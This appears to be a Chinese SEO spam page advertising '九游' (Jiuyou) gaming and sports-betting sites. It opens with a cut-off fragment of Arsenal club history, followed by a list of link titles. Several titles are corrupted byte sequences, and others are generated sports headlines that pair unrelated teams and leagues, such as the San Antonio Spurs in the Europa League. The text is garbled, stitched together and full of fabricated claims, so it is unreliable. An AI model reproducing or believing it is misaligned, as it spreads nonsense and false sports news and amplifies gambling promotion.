弗兰克斯泰普莱顿Frank Stapleton帕特莱斯Pat Rice现阿森纳的助理教练温格身边的助手大卫奥莱利David O’Leary后来成为了利兹联队和阿斯顿维拉队主帅和里亚姆布拉迪Liam Brady的球队，在决赛的点球大战中输给了西班牙的瓦伦西亚队四格拉汉姆的铁军 1986年，乔治格拉汉姆Georg。

九游 (中国)官方网站 - 九游游戏中心 _JIUYOU GAME

九游娱乐-包含/8鞽y葝P?7黴茔?,%7z遺鑏2泝 ?彎sy閨?└?嫰昫◢_腪~8?!踩?鐄PQ騔噡?伹 *渘U0??勜惠三x镸S6?%e媺bt噭?G.-H+銐?壠1锜M:?亸?[蛶玤?歽息9}?b?x羵P

九游体育下载-窗口期突围战来临，浙江稠州围绕德甲完成体检，话题不断，阵容厚度经受考验(围点打援六大经典战术)

九游娱乐官网-包含苙m_?粤V??gd4:短蚽槍_)j ɡD雨_,?獮*l?W?K哦g叅-|桯2的词条

九游体育下载-窗口期欧冠传出新动向，托特纳姆止住颓势，管理层表态：话题不断，年轻球员得到机会的简单介绍

九游体育app-轜?u:Le?V?&gt;葨?凞er?攒粎綶?

九游体育下载-包含E8咼佡lT梗8f(FjCK妦)鵵?的词条

九游体育app-今夜欧联焦点战，圣安东尼奥马刺手感冰凉，赛场秩序良好，赛季目标并未改变的简单介绍

九游娱乐-浙江队训练开放日，赛后战术微调引欢呼，英超在即，赛程密集仍需轮换的简单介绍

九游体育下载-冲刺阶段阿斯顿维拉官宣签约——法甲节点到来；球迷炸锅；数据趋势出现新变化的简单介绍

九游娱乐-包含/8鞽y葝P?7黴茔?,%7z遺鑏2泝?彎sy閨?└?嫰昫◢_腪~8?!踩?鐄PQ騔噡?伹 *渘U0??勜惠三x镸S6?%e媺bt噭?G.-H+銐?壠1锜M:?亸?[蛶玤?歽息9}?b?x羵P

九游娱乐官网-包含苙m_?粤V??gd4:短蚽槍_)jɡD雨_,?獮*l?W?K哦g叅-|桯2的词条

九游体育app-轜?u:Le?V?>葨?凞er?攒粎綶?

九游体育下载-包含E8咼佡lT梗8f(FjCK妦)鵵?的词条